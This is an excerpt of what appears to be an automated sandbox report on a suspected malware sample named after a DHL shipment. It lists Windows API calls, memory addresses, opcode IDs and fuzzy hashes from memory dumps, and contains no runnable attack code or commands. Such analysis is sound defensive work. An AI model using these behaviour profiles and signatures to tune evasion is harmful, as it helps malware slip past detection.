                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$Close$BuffCharConnectEnumOpenRegistryUpperValue
                                                                                            • String ID:
                                                                                            • API String ID: 1120388591-0
                                                                                            • Opcode ID: bc1c030f79eafe24cfa1df5e8df3015df7e66711bda588c38f481dc6a53b0ece
                                                                                            • Instruction ID: 1aaec271e32be6c9dcd13963c9c1a12f02b310dffa920434c40751e61e19ec75
                                                                                            • Opcode Fuzzy Hash: bc1c030f79eafe24cfa1df5e8df3015df7e66711bda588c38f481dc6a53b0ece
                                                                                            • Instruction Fuzzy Hash: 6F818F71208241EFD714DF24C895E2ABBE5FF85308F14896CF5998B2A2DB31ED45CB92
                                                                                            APIs
                                                                                            • VariantInit.OLEAUT32(00000035), ref: 0087F7B9
                                                                                            • SysAllocString.OLEAUT32(00000001), ref: 0087F860
                                                                                            • VariantCopy.OLEAUT32(0087FA64,00000000), ref: 0087F889
                                                                                            • VariantClear.OLEAUT32(0087FA64), ref: 0087F8AD
                                                                                            • VariantCopy.OLEAUT32(0087FA64,00000000), ref: 0087F8B1
                                                                                            • VariantClear.OLEAUT32(?), ref: 0087F8BB
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Variant$ClearCopy$AllocInitString
                                                                                            • String ID:
                                                                                            • API String ID: 3859894641-0
                                                                                            • Opcode ID: 936c5520202094cd625d6ec8b655ef1e2fbaf61e237a18587afe95252394036c
                                                                                            • Instruction ID: d6776a27d986a6ae55aee5d81f96d5bd2195b19f5fa726393ce5f06e53024d99
                                                                                            • Opcode Fuzzy Hash: 936c5520202094cd625d6ec8b655ef1e2fbaf61e237a18587afe95252394036c
                                                                                            • Instruction Fuzzy Hash: 2751B531500314AACF10AB6AD895769B7A4FF45314F24D466EB09EF29BDB70CC40D7A7
                                                                                            APIs
                                                                                              • Part of subcall function 00827620: _wcslen.LIBCMT ref: 00827625
                                                                                              • Part of subcall function 00826B57: _wcslen.LIBCMT ref: 00826B6A
                                                                                            • GetOpenFileNameW.COMDLG32(00000058), ref: 008994E5
                                                                                            • _wcslen.LIBCMT ref: 00899506
                                                                                            • _wcslen.LIBCMT ref: 0089952D
                                                                                            • GetSaveFileNameW.COMDLG32(00000058), ref: 00899585
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: _wcslen$FileName$OpenSave
                                                                                            • String ID: X
                                                                                            • API String ID: 83654149-3081909835
                                                                                            • Opcode ID: fcdee2a8a28f0778d90a809f542e058ff63bb66eea06c711daa37a9693a0d6c7
                                                                                            • Instruction ID: 5eb0a435737c0040e67540e28008be2efa0c2a3e596940e21937f7167eed8c2c
                                                                                            • Opcode Fuzzy Hash: fcdee2a8a28f0778d90a809f542e058ff63bb66eea06c711daa37a9693a0d6c7
                                                                                            • Instruction Fuzzy Hash: BFE18F315043509FDB14EF28D881A6AB7E4FF84314F09896DE899DB3A2DB31DD45CB92
                                                                                            APIs
                                                                                              • Part of subcall function 00839BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00839BB2
                                                                                            • BeginPaint.USER32(?,?,?), ref: 00839241
                                                                                            • GetWindowRect.USER32(?,?), ref: 008392A5
                                                                                            • ScreenToClient.USER32(?,?), ref: 008392C2
                                                                                            • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 008392D3
                                                                                            • EndPaint.USER32(?,?,?,?,?), ref: 00839321
                                                                                            • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 008771EA
                                                                                              • Part of subcall function 00839339: BeginPath.GDI32(00000000), ref: 00839357
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: BeginPaintWindow$ClientLongPathRectRectangleScreenViewport
                                                                                            • String ID:
                                                                                            • API String ID: 3050599898-0
                                                                                            • Opcode ID: 6142b6fd07dc453860f84b8ef97ccadaa445d1159eead32ed1a931d530a918ef
                                                                                            • Instruction ID: 5110df22e336143018812b61c8e1d7714a61a88d6fe01e6c47ff1812b6c8766c
                                                                                            • Opcode Fuzzy Hash: 6142b6fd07dc453860f84b8ef97ccadaa445d1159eead32ed1a931d530a918ef
                                                                                            • Instruction Fuzzy Hash: FC419270104201EFDB11DF28CC88FBA7BA8FB95324F140669F9A5D72A1D7B19845DBA2
                                                                                            APIs
                                                                                            • InterlockedExchange.KERNEL32(?,000001F5), ref: 0089080C
                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,?,00000000), ref: 00890847
                                                                                            • EnterCriticalSection.KERNEL32(?), ref: 00890863
                                                                                            • LeaveCriticalSection.KERNEL32(?), ref: 008908DC
                                                                                            • ReadFile.KERNEL32(?,?,0000FFFF,00000000,00000000), ref: 008908F3
                                                                                            • InterlockedExchange.KERNEL32(?,000001F6), ref: 00890921
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
                                                                                            • String ID:
                                                                                            • API String ID: 3368777196-0
                                                                                            • Opcode ID: ee8b595b1144d120816948038c9a747c4407186673bcda2050ed678049f5e848
                                                                                            • Instruction ID: 805a2037bcd5bb033e1bd96a2e88b968ae1a533dcba19da33ae9214653f3fd2e
                                                                                            • Opcode Fuzzy Hash: ee8b595b1144d120816948038c9a747c4407186673bcda2050ed678049f5e848
                                                                                            • Instruction Fuzzy Hash: 0D415671A00205AFDF14AF58DC85AAA77B9FF44300F1440A9E900EE297DB30DE60DBA1
                                                                                            APIs
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000,?,00000000,00000000,?,0087F3AB,00000000,?,?,00000000,?,0087682C,00000004,00000000,00000000), ref: 008B824C
                                                                                            • EnableWindow.USER32(00000000,00000000), ref: 008B8272
                                                                                            • ShowWindow.USER32(FFFFFFFF,00000000), ref: 008B82D1
                                                                                            • ShowWindow.USER32(00000000,00000004), ref: 008B82E5
                                                                                            • EnableWindow.USER32(00000000,00000001), ref: 008B830B
                                                                                            • SendMessageW.USER32(?,0000130C,00000000,00000000), ref: 008B832F
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Window$Show$Enable$MessageSend
                                                                                            • String ID:
                                                                                            • API String ID: 642888154-0
                                                                                            • Opcode ID: e8dd5f250e56aab4bbcc1716209f944f4c97dacad1d9b0f0dd79e3853a95ff05
                                                                                            • Instruction ID: c1a94ba256244619a12a19b7c4ce78b5fd75f37adb70cd9dc5cd60136c35c0c8
                                                                                            • Opcode Fuzzy Hash: e8dd5f250e56aab4bbcc1716209f944f4c97dacad1d9b0f0dd79e3853a95ff05
                                                                                            • Instruction Fuzzy Hash: AB416034601644EFDF26CF25C899FE57FE5FB1A714F1842A9E5088B3A2CB71A841CB90
                                                                                            APIs
                                                                                            • IsWindowVisible.USER32(?), ref: 00884C95
                                                                                            • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00884CB2
                                                                                            • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00884CEA
                                                                                            • _wcslen.LIBCMT ref: 00884D08
                                                                                            • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00884D10
                                                                                            • _wcsstr.LIBVCRUNTIME ref: 00884D1A
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: MessageSend$BuffCharUpperVisibleWindow_wcslen_wcsstr
                                                                                            • String ID:
                                                                                            • API String ID: 72514467-0
                                                                                            • Opcode ID: 02bf5dccbade71216b2483db42caac08c1526e096edbf05f065508685a8694b0
                                                                                            • Instruction ID: 755797299c70b6fce12da170c13d2cfa1cf7e257faa8c6287abc339d082224b1
                                                                                            • Opcode Fuzzy Hash: 02bf5dccbade71216b2483db42caac08c1526e096edbf05f065508685a8694b0
                                                                                            • Instruction Fuzzy Hash: 60212633604206BBEB656B39EC09E7B7B9CFF45754F10902EF805CA192EA61DC0093A1
                                                                                            APIs
                                                                                              • Part of subcall function 00823AA2: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00823A97,?,?,00822E7F,?,?,?,00000000), ref: 00823AC2
                                                                                            • _wcslen.LIBCMT ref: 0089587B
                                                                                            • CoInitialize.OLE32(00000000), ref: 00895995
                                                                                            • CoCreateInstance.OLE32(008BFCF8,00000000,00000001,008BFB68,?), ref: 008959AE
                                                                                            • CoUninitialize.OLE32 ref: 008959CC
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                             • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                             • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CreateFullInitializeInstanceNamePathUninitialize_wcslen
                                                                                            • String ID: .lnk
                                                                                            • API String ID: 3172280962-24824748
                                                                                            • Opcode ID: 05c6ac80fd10a71a1186d3d0505fb2d1ad8f45789226cd8f712e997f4d931046
                                                                                            • Instruction ID: 0340783ddb6af0e60283a1511d616139ed0aeb9fe2ced9dbd037f3b31dbc22e3
                                                                                            • Opcode Fuzzy Hash: 05c6ac80fd10a71a1186d3d0505fb2d1ad8f45789226cd8f712e997f4d931046
                                                                                            • Instruction Fuzzy Hash: 3FD163716047119FCB04EF29D480A2ABBE1FF89724F188859F889DB361DB31ED45CB92
                                                                                            APIs
                                                                                              • Part of subcall function 00880FB4: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00880FCA
                                                                                              • Part of subcall function 00880FB4: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00880FD6
                                                                                              • Part of subcall function 00880FB4: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00880FE5
                                                                                              • Part of subcall function 00880FB4: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00880FEC
                                                                                              • Part of subcall function 00880FB4: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00881002
                                                                                            • GetLengthSid.ADVAPI32(?,00000000,00881335), ref: 008817AE
                                                                                            • GetProcessHeap.KERNEL32(00000008,00000000), ref: 008817BA
                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 008817C1
                                                                                            • CopySid.ADVAPI32(00000000,00000000,?), ref: 008817DA
                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000,00881335), ref: 008817EE
                                                                                            • HeapFree.KERNEL32(00000000), ref: 008817F5
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                            • String ID:
                                                                                            • API String ID: 3008561057-0
                                                                                            • Opcode ID: 209dfce4b095cf8d7015ec141ab7e8f18e3d76521ea5a0c7f20ac9163339277e
                                                                                            • Instruction ID: 7e1cbbcc0549398b99f05fa2dca03c946694d4f4af566679eb82739fc2c16a65
                                                                                            • Opcode Fuzzy Hash: 209dfce4b095cf8d7015ec141ab7e8f18e3d76521ea5a0c7f20ac9163339277e
                                                                                            • Instruction Fuzzy Hash: F6119772600205EBDF10AFA8DC49BAE7BADFB41359F104119F481E7214CB36A946CB60
                                                                                            APIs
                                                                                            • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 008814FF
                                                                                            • OpenProcessToken.ADVAPI32(00000000), ref: 00881506
                                                                                            • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 00881515
                                                                                            • CloseHandle.KERNEL32(00000004), ref: 00881520
                                                                                            • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 0088154F
                                                                                            • DestroyEnvironmentBlock.USERENV(00000000), ref: 00881563
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                            • String ID:
                                                                                            • API String ID: 1413079979-0
                                                                                            • Opcode ID: a3440a150f9c49c30348fe196e8f698e6800a444f14ea2bb9814169c07f208c3
                                                                                            • Instruction ID: 101fac8515ea499087dda2a0805f8c3358dd6c704a38f0392c8f327d49ef7469
                                                                                            • Opcode Fuzzy Hash: a3440a150f9c49c30348fe196e8f698e6800a444f14ea2bb9814169c07f208c3
                                                                                            • Instruction Fuzzy Hash: E611567250420DABDF119FA8ED49FDE7BAEFF48708F044124FA05A2160C7718E62DB60
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00843379,00842FE5), ref: 00843390
                                                                                            • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 0084339E
                                                                                            • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 008433B7
                                                                                            • SetLastError.KERNEL32(00000000,?,00843379,00842FE5), ref: 00843409
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLastValue___vcrt_
                                                                                            • String ID:
                                                                                            • API String ID: 3852720340-0
                                                                                            • Opcode ID: 1ac824af85e5c08c5688cc51c6a39651cf766b62cc88b12755ac4fee8d8e4c99
                                                                                            • Instruction ID: c79fc6acced7ef97e874ba0b2653f08f5d4323470b4c803ad26be14959dd2964
                                                                                            • Opcode Fuzzy Hash: 1ac824af85e5c08c5688cc51c6a39651cf766b62cc88b12755ac4fee8d8e4c99
                                                                                            • Instruction Fuzzy Hash: 6501F733A0972ABFA6292B787CC5A672F94FB257797200329F420C53F1FF114E026544
                                                                                            APIs
                                                                                            • GetLastError.KERNEL32(?,?,00855686,00863CD6,?,00000000,?,00855B6A,?,?,?,?,?,0084E6D1,?,008E8A48), ref: 00852D78
                                                                                            • _free.LIBCMT ref: 00852DAB
                                                                                            • _free.LIBCMT ref: 00852DD3
                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,0084E6D1,?,008E8A48,00000010,00824F4A,?,?,00000000,00863CD6), ref: 00852DE0
                                                                                            • SetLastError.KERNEL32(00000000,?,?,?,?,0084E6D1,?,008E8A48,00000010,00824F4A,?,?,00000000,00863CD6), ref: 00852DEC
                                                                                            • _abort.LIBCMT ref: 00852DF2
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: ErrorLast$_free$_abort
                                                                                            • String ID:
                                                                                            • API String ID: 3160817290-0
                                                                                            • Opcode ID: f7dbad02c671075c15b0b11fefdcbe4726c42be1400b73bc81907134757148ff
                                                                                            • Instruction ID: f5bb3f9ab0246e1b44e5afd211f53b67c75a94c3ac009a9af80f1b782852c155
                                                                                            • Opcode Fuzzy Hash: f7dbad02c671075c15b0b11fefdcbe4726c42be1400b73bc81907134757148ff
                                                                                            • Instruction Fuzzy Hash: 3CF0A432544A046BC212373CAC06E5A2A69FBC37A7F244519FC24E2292EF24880E4162
                                                                                            APIs
                                                                                              • Part of subcall function 00839639: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00839693
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396A2
                                                                                              • Part of subcall function 00839639: BeginPath.GDI32(?), ref: 008396B9
                                                                                              • Part of subcall function 00839639: SelectObject.GDI32(?,00000000), ref: 008396E2
                                                                                            • MoveToEx.GDI32(?,-00000002,00000000,00000000), ref: 008B8A4E
                                                                                            • LineTo.GDI32(?,00000003,00000000), ref: 008B8A62
                                                                                            • MoveToEx.GDI32(?,00000000,-00000002,00000000), ref: 008B8A70
                                                                                            • LineTo.GDI32(?,00000000,00000003), ref: 008B8A80
                                                                                            • EndPath.GDI32(?), ref: 008B8A90
                                                                                            • StrokePath.GDI32(?), ref: 008B8AA0
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Path$LineMoveObjectSelect$BeginCreateStroke
                                                                                            • String ID:
                                                                                            • API String ID: 43455801-0
                                                                                            • Opcode ID: ced089823e5619f5972ec0a9a21f46284766c1e0c68f43d5192c56075fb5afe8
                                                                                            • Instruction ID: 8dbaf112088da70ffd64852db0c06739dfe8db1812a40728f8b103431a2c4a07
                                                                                            • Opcode Fuzzy Hash: ced089823e5619f5972ec0a9a21f46284766c1e0c68f43d5192c56075fb5afe8
                                                                                            • Instruction Fuzzy Hash: 03110576400119FFEF129F94DC88EAA7F6CFB08390F008122FA599A1A1D7719D55DFA0
                                                                                            APIs
                                                                                            • GetDC.USER32(00000000), ref: 00885218
                                                                                            • GetDeviceCaps.GDI32(00000000,00000058), ref: 00885229
                                                                                            • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00885230
                                                                                            • ReleaseDC.USER32(00000000,00000000), ref: 00885238
                                                                                            • MulDiv.KERNEL32(000009EC,?,00000000), ref: 0088524F
                                                                                            • MulDiv.KERNEL32(000009EC,00000001,?), ref: 00885261
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: CapsDevice$Release
                                                                                            • String ID:
                                                                                            • API String ID: 1035833867-0
                                                                                            • Opcode ID: abc2ed9751a64cc071a278bfa05790d414bf938c2ff083cd0ec7708b9a5fef93
                                                                                            • Instruction ID: de700759f9412719621b7ab873a3f0a6d641980281246608eb8b15ef99683359
                                                                                            • Opcode Fuzzy Hash: abc2ed9751a64cc071a278bfa05790d414bf938c2ff083cd0ec7708b9a5fef93
                                                                                            • Instruction Fuzzy Hash: A1016275E40718BBEB10ABAA9C49E5EBFB8FF48751F044165FA04E7291DA709C00CFA0
                                                                                            APIs
                                                                                            • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00821BF4
                                                                                            • MapVirtualKeyW.USER32(00000010,00000000), ref: 00821BFC
                                                                                            • MapVirtualKeyW.USER32(000000A0,00000000), ref: 00821C07
                                                                                            • MapVirtualKeyW.USER32(000000A1,00000000), ref: 00821C12
                                                                                            • MapVirtualKeyW.USER32(00000011,00000000), ref: 00821C1A
                                                                                            • MapVirtualKeyW.USER32(00000012,00000000), ref: 00821C22
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000000.00000002.2075231132.0000000000821000.00000020.00000001.01000000.00000003.sdmp, Offset: 00820000, based on PE: true
                                                                                            • Associated: 00000000.00000002.2075203477.0000000000820000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008BC000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075512255.00000000008E2000.00000002.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075607994.00000000008EC000.00000004.00000001.01000000.00000003.sdmp
                                                                                            • Associated: 00000000.00000002.2075644862.00000000008F4000.00000002.00000001.01000000.00000003.sdmp
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_0_2_820000_DHL 0737-12182024.jbxd
                                                                                            Similarity
                                                                                            • API ID: Virtual
                                                                                            • String ID:
                                                                                            • API String ID: 4278518827-0
                                                                                            • Opcode ID: 6e7c39a2687ec14d8c2d81263f08c6392070172a180d88fa738f2bfb85848607
                                                                                            • Instruction ID: be596a76f7549e4a8ab4e39f15ad1a29e936905b34182a58a4acc5f0ce722efc
                                                                                            • Opcode Fuzzy Hash: 6e7c39a2687ec14d8c2d81263f08c6392070172a180d88fa738f2bfb85848607
                                                                                            • Instruction Fuzzy Hash: 3B0167B0902B5ABDE3008F6A8C85B52FFA8FF19354F00411BA15C4BA42C7F5A864CBE5
                                                                                            APIs
                                                                                            • PostMessageW.USER32(?,00000010,00000000,00000000), ref: 0088EB30
                                                                                            • SendMessageTimeoutW.USER32(?,00000010,00000000,00000000,00000002,000001F4,?), ref: 0088EB46
